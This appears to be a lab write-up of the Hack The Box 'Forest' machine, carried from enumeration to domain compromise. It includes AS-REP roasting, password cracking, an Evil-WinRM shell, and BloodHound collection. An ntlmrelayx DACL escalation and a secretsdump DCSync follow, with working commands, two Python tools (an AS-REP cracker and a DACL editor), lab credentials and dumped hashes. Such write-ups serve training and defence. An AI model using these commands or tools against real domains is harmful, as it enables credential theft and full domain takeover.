Group 'Exchange Servers' (RID: 1118) has member: HTB\EXCH01$
Group 'Exchange Servers' (RID: 1118) has member: HTB\$D31000-NSEL5BRJ63V7
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Group '$D31000-NSEL5BRJ63V7' (RID: 1133) has member: HTB\EXCH01$
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Group 'Group Policy Creator Owners' (RID: 520) has member: HTB\Administrator
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Group 'Domain Computers' (RID: 515) has member: HTB\EXCH01$
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Group 'Schema Admins' (RID: 518) has member: HTB\Administrator
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Group 'Organization Management' (RID: 1104) has member: HTB\Administrator
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614.

=======================================================================
| Users on 10.10.10.161 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 710.
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 742.

=============================================
| Getting printer info for 10.10.10.161 |
=============================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 995.
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED

enum4linux complete on Sun Jan 12 11:01:56 2020
As expected, enum4linux returned a good amount of information. We found several users that may be useful, namely sebastien, lucinda, andy, mark and santi, plus a service account called svc-alfresco.
We also learned that the domain password policy is very lax: it does not require complex passwords, which suggests that cracking one may be relatively easy. And the group listing (Exchange Trusted Subsystem, Organization Management) together with the EXCH01$ computer account tells us the domain has a Microsoft Exchange installation, which will also turn out to be useful.
Next we use impacket's GetNPUsers.py to look for accounts that do not require Kerberos pre-authentication (the UF_DONT_REQUIRE_PREAUTH flag in userAccountControl). For such an account the KDC hands out an AS-REP to anyone who asks for it, and the encrypted part of that reply is encrypted under a key derived from the user's password, so it can be cracked offline. This is AS-REP roasting.
We try the usernames from the previous step and get a hit on the service account svc-alfresco, for which the KDC returns an AS-REP. Strictly speaking, what we obtain is the AS-REP enc-part rather than the TGT itself: the TGT is encrypted with the krbtgt key and is of no use to us, whereas the enc-part is encrypted with svc-alfresco's own key, which is what makes it crackable.
```
# GetNPUsers.py htb.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.161
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User HealthMailboxc3d7722 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfc9daad doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxc0a90c9 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox670628e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox968e74d doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox6ded678 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox83d6781 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfd87238 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxb01ac64 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox7108a4e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox0659cc1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:c71c1e6a12efa32f84f890f0819a87ac$a1d9a1396bb9b9f745682031e2b0bc05fc8cc45206c3433a65e146ee3a6b2e189bf5e566ccf251ad99c39fde4adc630ddb5b5d5f58429ac9c300474f7132c8b103c5ba4f375699062b4a2faa7fa98049cd89f87de29d312ac7eda724bedc58665a8cc1a5fa6b8a2ab82646d0f75ca4b939a6390ebe4ac93515bd76f0132e1c638cf3b8b0c32bc4bffc2f85fcf5b4f4c3e0860ad4dfffa738831a32b10a6b6cd1f10ae6b15fcbe34ea38b454045c63a5d7c32060dd8ad806db4b82528963b32d352694784410dbc735a2b938bebdea078ba9025bf9b23da7cc728b5e0bed7b8d6f98873873d00
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax
```
The KDC_ERR_CLIENT_REVOKED lines belong to disabled accounts and can be ignored. What matters is that we got a crackable hash for the svc-alfresco service account. We will run it through John the Ripper; hashcat (mode 18200, krb5asrep) would do the same job.
```
# john --wordlist=/usr/share/wordlists/rockyou.txt svc-alfresco.hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$23$svc-alfresco@HTB)
1g 0:00:00:10 DONE (2020-01-12 19:39) 0.09606g/s 392484p/s 392484c/s 392484C/s s401447401447401447..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```
So the password for svc-alfresco is "s3rvice". Ten seconds against rockyou is exactly what the lax password policy we saw earlier would lead us to expect.
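To see what John is actually doing with that `$krb5asrep$23$` line, here is the etype 23 (RC4-HMAC) check written out in Python. This is an added example, not code from the original post nor from impacket, John or hashcat; it carries its own MD4 and RC4 because neither is reliably available in the standard library. It is run against the hash GetNPUsers.py returned above with a short, constructed candidate list standing in for rockyou.txt.

```python
"""AS-REP roasting by hand: what john/hashcat do with a $krb5asrep$23$ line.

Added example for this writeup, not impacket/john/hashcat code.  For etype 23
(RC4-HMAC, RFC 4757) one candidate password is checked like this:

    NT  = MD4(UTF-16LE(password))             # the user's long-term key
    K1  = HMAC-MD5(NT, usage 8 as 4-byte LE)  # Windows uses usage 8 for the AS-REP enc-part
    K3  = HMAC-MD5(K1, checksum)              # checksum = first 16 bytes of the enc-part
    P   = RC4(K3, edata)                      # 8-byte confounder || EncASRepPart
    hit iff HMAC-MD5(K1, P) == checksum

The hash is the one GetNPUsers.py printed for svc-alfresco; the candidate
list in __main__ is a constructed stand-in for rockyou.txt.
"""
import hashlib
import hmac
import struct
from typing import Iterable, Optional, Tuple

ASREP_LINE = (
    "$krb5asrep$23$svc-alfresco@HTB.LOCAL:c71c1e6a12efa32f84f890f0819a87ac$"
    "a1d9a1396bb9b9f745682031e2b0bc05fc8cc45206c3433a65e146ee3a6b2e189bf5e566ccf251ad"
    "99c39fde4adc630ddb5b5d5f58429ac9c300474f7132c8b103c5ba4f375699062b4a2faa7fa98049"
    "cd89f87de29d312ac7eda724bedc58665a8cc1a5fa6b8a2ab82646d0f75ca4b939a6390ebe4ac935"
    "15bd76f0132e1c638cf3b8b0c32bc4bffc2f85fcf5b4f4c3e0860ad4dfffa738831a32b10a6b6cd1"
    "f10ae6b15fcbe34ea38b454045c63a5d7c32060dd8ad806db4b82528963b32d352694784410dbc73"
    "5a2b938bebdea078ba9025bf9b23da7cc728b5e0bed7b8d6f98873873d00"
)


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, written out because hashlib's md4 is often disabled."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda v, s: ((v << s) | (v >> (32 - s))) & 0xFFFFFFFF
    rounds = (
        (F, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[idx] + k) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c      # rotate roles so the next step updates the old d
        a, b, c, d = ((a + aa) & 0xFFFFFFFF, (b + bb) & 0xFFFFFFFF,
                      (c + cc) & 0xFFFFFFFF, (d + dd) & 0xFFFFFFFF)
    return struct.pack("<4I", a, b, c, d)


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):                     # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                        # keystream XOR
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def parse_asrep(line: str) -> Tuple[int, str, bytes, bytes]:
    """Split the GetNPUsers format '$krb5asrep$<etype>$<user@REALM>:<checksum>$<edata>'."""
    head, rest = line.split(":", 1)
    _, _, etype, principal = head.split("$")
    checksum, edata = rest.split("$")
    return int(etype), principal, bytes.fromhex(checksum), bytes.fromhex(edata)


def asrep_matches(checksum: bytes, edata: bytes, password: str) -> bool:
    k1 = hmac.new(nt_hash(password), struct.pack("<I", 8), hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    plain = rc4(k3, edata)                   # confounder || ASN.1 EncASRepPart
    return hmac.compare_digest(hmac.new(k1, plain, hashlib.md5).digest(), checksum)


def crack_asrep(line: str, candidates: Iterable[str]) -> Optional[str]:
    etype, _, checksum, edata = parse_asrep(line)
    if etype != 23:
        raise ValueError("only etype 23 (RC4-HMAC) is implemented here")
    return next((pw for pw in candidates if asrep_matches(checksum, edata, pw)), None)


if __name__ == "__main__":
    # Constructed candidate list; a real run would stream rockyou.txt.
    print(crack_asrep(ASREP_LINE, ["password", "Welcome1", "Forest2019", "s3rvice"]))
```

The per-candidate cost is one MD4, three HMAC-MD5 calls and an RC4 pass over roughly 230 bytes, which is why a weak password on a pre-auth-disabled account falls in seconds. The fix on the directory side is to clear "Do not require Kerberos preauthentication" on the account; on the crypto side, AES etypes (17/18) replace the NT hash with a PBKDF2 key of 4096 iterations, which is far slower per guess but still crackable offline if the password is weak.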
Getting the user flag
Now that we have a valid set of credentials, let's try to get a shell on the box. The port scan showed 5985/tcp (WinRM) open, so we use Evil-WinRM, which gives us a remote PowerShell session over WinRM as long as the credentials are correct and the account is allowed to log on that way. Let's see whether svc-alfresco gets us in and lets us read the user flag.
```
# ruby /root/github/evil-winrm/evil-winrm.rb -i 10.10.10.161 -u svc-alfresco -p s3rvice -P 5985

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
```
We have our shell. We check whether we can read the user flag, and there it is on the desktop.
```
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls

    Directory: C:\Users\svc-alfresco\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/23/2019   2:16 PM             32 user.txt

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>
```
Privilege escalation
Now that we have a foothold and the user flag, the next step is to escalate privileges until we have Administrator access to the domain controller.
For this we can use BloodHound. Its SharpHound.ps1 collector gathers the domain's users, groups, sessions and object ACLs, and the BloodHound GUI then lets us look for a path from svc-alfresco to Domain Admins.
There are two ways to collect the data: run the SharpHound collector on the Forest box itself, or collect remotely from our own machine with bloodhound-python. We'll cover both.
Option 1: running the collector on the Forest box
After downloading SharpHound.ps1, we upload it to the box through the svc-alfresco session we already have, using Evil-WinRM's upload command (the byte counter it prints is for the encoded transfer, hence larger than the file's size on disk).
```
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> upload /root/github/BloodHound/Ingestors/SharpHound.ps1 C:\Temp\SharpHound.ps1
Info: Uploading /root/github/BloodHound/Ingestors/SharpHound.ps1 to C:\Temp\SharpHound.ps1

Data: 1226060 bytes of 1226060 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> cd C:\Temp
*Evil-WinRM* PS C:\Temp> ls

    Directory: C:\Temp

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/12/2020  11:57 AM         919546 SharpHound.ps1

*Evil-WinRM* PS C:\Temp>
```
Once SharpHound.ps1 is on the box, we import it into the PowerShell session and run the collector with every collection method enabled.
```
*Evil-WinRM* PS C:\Temp> Import-Module ./SharpHound.ps1
*Evil-WinRM* PS C:\Temp> Invoke-BloodHound -CollectionMethod All
```
This writes a zip archive into the same directory. As soon as the command finished I had a zip file in C:\Temp, which we need to bring back to our machine and import into BloodHound.
```
*Evil-WinRM* PS C:\Temp> ls

    Directory: C:\Temp

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/12/2020  11:59 AM          12560 20200112115941_BloodHound.zip

*Evil-WinRM* PS C:\Temp>
```
We can pull the file back with Evil-WinRM's download command:
```
*Evil-WinRM* PS C:\Temp> download C:\Temp\20200112115941_BloodHound.zip /tmp
Info: Downloading C:\Temp\20200112115941_BloodHound.zip to /tmp

Data: 12560 bytes of 12560 bytes copied

Info: Download successful!

*Evil-WinRM* PS C:\Temp>
```
Option 2: using bloodhound-python
For this step we need BloodHound installed on our own machine. BloodHound is an application for visualising Active Directory environments as a graph; it is used to find attack paths through access control lists (ACLs), users, groups, trusts and other AD objects.
Once it is installed, we start the GUI with:
```
bloodhound
```
Then we run bloodhound-python from our own machine with svc-alfresco's credentials; it collects the same data over LDAP and SMB without putting anything on the target.
```
# bloodhound-python -c All -u svc-alfresco -p s3rvice -d htb.local -ns 10.10.10.161
INFO: Found AD domain: htb.local
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: FOREST.htb.local
WARNING: Could not resolve SID: S-1-5-21-3072663084-364016917-1341370565-1153
WARNING: Could not resolve SID: S-1-5-21-3072663084-364016917-1341370565-1153
WARNING: Could not resolve SID: S-1-5-21-3072663084-364016917-1341370565-1153
WARNING: Could not resolve SID: S-1-5-21-3072663084-364016917-1341370565-1153
WARNING: Could not resolve SID: S-1-5-21-3072663084-364016917-1341370565-1153
INFO: Found 31 users
INFO: Found 72 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: FOREST.htb.local
INFO: Querying computer: EXCH01.htb.local
INFO: Done in 01M 15S
```
This produces the same kind of data as option 1: a set of .json files with the domain information (zipped into one archive if you pass --zip).
We import the data from either option into BloodHound and get a graph of the domain like the one in the screenshot (not reproduced here).
BloodHound reveals the path. svc-alfresco is not itself a member of "Exchange Windows Permissions", but through nested group membership (on this box: Service Accounts, then Privileged IT Accounts, then Account Operators) it has the right to add members to that group, and "Exchange Windows Permissions" holds WriteDacl on the htb.local domain object. WriteDacl on the domain means we can grant ourselves any right on it, including the replication rights that DCSync needs.
So the first step is to add svc-alfresco to the group ourselves. Note that group membership is evaluated when a logon token is built, so the new membership only applies to fresh authentications, not to the Evil-WinRM session we are already in; the relay in the next step is a fresh authentication, so that is fine.
```
*Evil-WinRM* PS C:\> net group "Exchange Windows Permissions" svc-alfresco /add
The command completed successfully.

*Evil-WinRM* PS C:\>
```
Now that the path exists, we use impacket's ntlmrelayx.py to actually write the privilege. With --escalate-user, as soon as it receives an NTLM authentication it relays it to LDAP on the DC and, if the relayed user has WriteDacl on the domain, adds ACEs to the domain's DACL that give the named user the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights, i.e. DCSync. This works because the DC does not enforce LDAP signing for the relayed session. Since we hold the credentials ourselves, we could also write the same ACEs directly (PowerView's Add-DomainObjectAcl or impacket's dacledit.py), but the relay route shown here is the one the original walkthrough used.
```
# ntlmrelayx.py -t ldap://10.10.10.161 --escalate-user svc-alfresco
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Servers started, waiting for connections
[*] Setting up HTTP Server
[*] HTTPD: Received connection from 127.0.0.1, attacking target ldap://10.10.10.161
```
At this point ntlmrelayx needs an NTLM authentication to relay. We point a browser at http://localhost/privexchange (the path is arbitrary; ntlmrelayx answers every path with an NTLM challenge) and enter svc-alfresco:s3rvice at the prompt. ntlmrelayx relays that authentication to LDAP on the DC and, because the relayed user now holds WriteDacl on the domain, grants it the DCSync rights:
```
# ntlmrelayx.py -t ldap://10.10.10.161 --escalate-user svc-alfresco
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Servers started, waiting for connections
[*] Setting up HTTP Server
[*] HTTPD: Received connection from 127.0.0.1, attacking target ldap://10.10.10.161
[*] HTTPD: Client requested path: /privexchange
[*] HTTPD: Client requested path: /privexchange
[*] HTTPD: Client requested path: /privexchange
[*] Authenticating against ldap://10.10.10.161 as \svc-alfresco SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User svc-alfresco now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20200112-190714.restore
```
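What "Modifying domain ACL" followed by "Success!" means at the byte level: the DACL of the htb.local domain object gains two object ACEs for svc-alfresco. The following added example (not impacket, BloodHound or the author's code) builds and parses the relevant part of a Windows self-relative security descriptor in pure Python and checks whether a given SID holds both replication rights, showing the DACL before and after the escalation. The domain SID is the one from the bloodhound-python warnings above and svc-alfresco's RID 1147 comes from the secretsdump output further down; the RID used for the Exchange Windows Permissions group is made up.

```python
"""The domain DACL before and after ntlmrelayx --escalate-user.

Added example for this writeup (not impacket/BloodHound code).  Layouts are
from MS-DTYP: SECURITY_DESCRIPTOR, ACL, ACCESS_ALLOWED_ACE and
ACCESS_ALLOWED_OBJECT_ACE.  The same parser works on a real
ntSecurityDescriptor attribute read over LDAP.
"""
import struct
import uuid
from typing import List, Optional, Set, Tuple

# Replication extended rights (MS-ADTS); both are needed for a full DCSync.
DS_REPLICATION_GET_CHANGES = uuid.UUID("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2")
DS_REPLICATION_GET_CHANGES_ALL = uuid.UUID("1131f6ad-9c07-11d1-f79f-00c04fc2dcd2")
ADS_RIGHT_DS_CONTROL_ACCESS = 0x00000100   # "control access" bit = extended right
WRITE_DAC = 0x00040000                     # what BloodHound calls WriteDacl
ACCESS_ALLOWED_ACE_TYP = 0x00
ACCESS_ALLOWED_OBJECT_ACE_TYP = 0x05
ACE_OBJECT_TYPE_PRESENT = 0x01
ACE_INHERITED_OBJECT_TYPE_PRESENT = 0x02

DOMAIN_SID = "S-1-5-21-3072663084-364016917-1341370565"  # htb.local, from bloodhound-python
SVC_ALFRESCO = DOMAIN_SID + "-1147"   # RID 1147 as listed by secretsdump
EXCH_WIN_PERMS = DOMAIN_SID + "-9999"  # hypothetical RID for Exchange Windows Permissions
DOMAIN_ADMINS = DOMAIN_SID + "-512"    # well-known RID, used as the object owner


def sid_to_bytes(sid: str) -> bytes:
    parts = sid.split("-")             # "S", revision, authority, sub-authorities...
    subs = [int(x) for x in parts[3:]]
    return (struct.pack("<BB", int(parts[1]), len(subs))
            + int(parts[2]).to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def sid_from_bytes(buf: bytes) -> Tuple[str, int]:
    """Return (SID string, bytes consumed)."""
    rev, count = buf[0], buf[1]
    authority = int.from_bytes(buf[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs)), 8 + 4 * count


def allowed_ace(sid: str, mask: int) -> bytes:
    body = struct.pack("<I", mask) + sid_to_bytes(sid)
    return struct.pack("<BBH", ACCESS_ALLOWED_ACE_TYP, 0, 4 + len(body)) + body


def allowed_object_ace(sid: str, mask: int, object_type: uuid.UUID) -> bytes:
    body = struct.pack("<II", mask, ACE_OBJECT_TYPE_PRESENT) + object_type.bytes_le + sid_to_bytes(sid)
    return struct.pack("<BBH", ACCESS_ALLOWED_OBJECT_ACE_TYP, 0, 4 + len(body)) + body


def build_sd(owner: str, aces: List[bytes]) -> bytes:
    """Self-relative SECURITY_DESCRIPTOR: owner, group (= owner here), DACL, no SACL."""
    dacl_body = b"".join(aces)
    dacl = struct.pack("<BBHHH", 4, 0, 8 + len(dacl_body), len(aces), 0) + dacl_body  # 4 = ACL_REVISION_DS
    owner_b = sid_to_bytes(owner)
    control = 0x8000 | 0x0004                                  # SE_SELF_RELATIVE | SE_DACL_PRESENT
    off_owner, off_group = 20, 20 + len(owner_b)
    off_dacl = off_group + len(owner_b)
    return struct.pack("<BBHIIII", 1, 0, control, off_owner, off_group, 0, off_dacl) + owner_b + owner_b + dacl


def parse_dacl(sd: bytes) -> List[Tuple[int, int, Optional[uuid.UUID], str]]:
    """(ace_type, access_mask, object_type GUID or None, trustee SID) per DACL entry."""
    revision, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if revision != 1 or not control & 0x0004 or off_dacl == 0:
        return []                                               # absent DACL: not handled here
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos, aces = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, pos)
        (mask,) = struct.unpack_from("<I", sd, pos + 4)
        p, obj = pos + 8, None
        if ace_type in (0x05, 0x06):                            # *_OBJECT_ACE types carry GUIDs
            (obj_flags,) = struct.unpack_from("<I", sd, p)
            p += 4
            if obj_flags & ACE_OBJECT_TYPE_PRESENT:
                obj = uuid.UUID(bytes_le=sd[p:p + 16])
                p += 16
            if obj_flags & ACE_INHERITED_OBJECT_TYPE_PRESENT:
                p += 16
        trustee, _ = sid_from_bytes(sd[p:pos + ace_size])
        aces.append((ace_type, mask, obj, trustee))
        pos += ace_size
    return aces


def rights_of(sd: bytes, sid: str) -> Set[str]:
    """BloodHound-style names for what one trustee is directly allowed on the object."""
    out: Set[str] = set()
    for ace_type, mask, obj, trustee in parse_dacl(sd):
        if trustee != sid or ace_type not in (ACCESS_ALLOWED_ACE_TYP, ACCESS_ALLOWED_OBJECT_ACE_TYP):
            continue
        if mask & WRITE_DAC:
            out.add("WriteDacl")
        if mask & ADS_RIGHT_DS_CONTROL_ACCESS:
            if obj is None:
                out.add("AllExtendedRights")                    # no GUID = every extended right
            elif obj == DS_REPLICATION_GET_CHANGES:
                out.add("GetChanges")
            elif obj == DS_REPLICATION_GET_CHANGES_ALL:
                out.add("GetChangesAll")
    return out


def can_dcsync(sd: bytes, sid: str) -> bool:
    r = rights_of(sd, sid)
    return "AllExtendedRights" in r or {"GetChanges", "GetChangesAll"} <= r


def grant_dcsync(aces: List[bytes], sid: str) -> List[bytes]:
    """The two ACEs the relay appends once the authenticating user holds WriteDacl."""
    return aces + [allowed_object_ace(sid, ADS_RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES),
                   allowed_object_ace(sid, ADS_RIGHT_DS_CONTROL_ACCESS, DS_REPLICATION_GET_CHANGES_ALL)]


BEFORE_ACES = [allowed_ace(EXCH_WIN_PERMS, WRITE_DAC)]           # constructed starting DACL
SD_BEFORE = build_sd(DOMAIN_ADMINS, BEFORE_ACES)
SD_AFTER = build_sd(DOMAIN_ADMINS, grant_dcsync(BEFORE_ACES, SVC_ALFRESCO))

if __name__ == "__main__":
    for label, sd in (("before", SD_BEFORE), ("after", SD_AFTER)):
        print(label, sorted(rights_of(sd, SVC_ALFRESCO)), "dcsync:", can_dcsync(sd, SVC_ALFRESCO))
```

rights_of only looks at ACEs that name the SID directly; a real check has to expand the token's group SIDs (that is how Exchange Windows Permissions members get WriteDacl in the first place) and honour deny ACEs and inheritance. On a live domain, read ntSecurityDescriptor over LDAP and feed the bytes to parse_dacl: any principal other than the domain controllers holding GetChanges and GetChangesAll on the domain head is a finding, and the aclpwn restore file the relay saved is there so the ACEs can be removed again afterwards.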
With that done, and as the output itself suggests, we use impacket's secretsdump.py. With these rights it performs a DCSync, i.e. it asks the DC to replicate account secrets over DRSUAPI exactly as another domain controller would, and returns the NTLM hashes stored in NTDS.dit, including the Administrator's.
```
# secretsdump.py -just-dc-ntlm HTB/svc-alfresco:s3rvice@10.10.10.161
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
